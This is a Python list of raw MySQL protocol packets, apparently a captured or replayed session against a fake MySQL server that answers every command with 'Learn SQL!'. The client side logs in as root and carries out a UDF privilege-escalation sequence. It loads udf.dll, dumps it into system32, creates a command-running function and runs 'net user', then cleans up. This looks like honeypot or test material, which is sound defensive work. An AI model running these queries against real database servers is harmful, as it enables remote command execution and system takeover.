stream = [('out', b'4\x00\x00\x00\x0a5.7.16\x00\x00\x00\x12gaaaaaaaa\x00,\xa2!\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00            \x00'),
('in', b'&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00'),
('out', b'\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00'),
('in', b'$\x00\x00\x00\x03create table temp_mix(abc longblob)'),
('out', b'\x07\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00'),
('in', b'\xcb\x00\x00\x00\x03returns string soname \xa1\xaeD:\x5c\x5cweb\x5c\x5cudf.dll\xa1\xaf\xa3\xbb\x0areturns string soname \xa1\xaeC:\x5c\x5cudf.dll\xa1\xaf\xa3\xbb\x0areturns string soname \xa1\xaeC:\x5c\x5cWindows\x5c\x5csystem32\x5c\x5cudf.dll\xa1\xaf\xa3\xbb\x0aCreate Function cmdshell returns string soname \xa1\xaeudf.dll\xa1\xaf'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'<\x00\x00\x00\x03insert into temp_mix  values(load_file(\x27D:\x5c\x5cweb\x5c\x5cudf.dll\x27))'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'7\x00\x00\x00\x03insert into temp_mix  values(load_file(\x27C:\x5c\x5cudf.dll\x27))'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'F\x00\x00\x00\x03select * from temp_mix into dumpfile \x27C:\x5c\x5cWindows\x5c\x5csystem32\x5c\x5cudf.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'6\x00\x00\x00\x03create function MyCmd returns string soname \x27udf.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x1b\x00\x00\x00\x035 select MyCmd(\x27net user\x27)'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b' \x00\x00\x00\x036 drop table if exists temp_mix'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'*\x00\x00\x00\x03delete from mysql.func where name=\x27MyCmd\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x1f\x00\x00\x00\x03show variables like \x27%plugin%\x27'),
('out', b'\x01\x00\x00\x01\x02$\x00\x00\x02\x03def\xfb\xfb\xfb\x0dVariable_name\xfb\x0c!\x00K\x00\x00\x00\xfd\x01\x00\x00\x00\x00\xfb\x1c\x00\x00\x03\x03def\xfb\xfb\xfb\x05Value\xfb\x0c!\x00K\x00\x00\x00\xfd\x01\x00\x00\x00\x00\xfb\x05\x00\x00\x04\xfe\x00\x00\x02\x00\x05\x00\x00\x05\xfe\x00\x00\x02\x00')]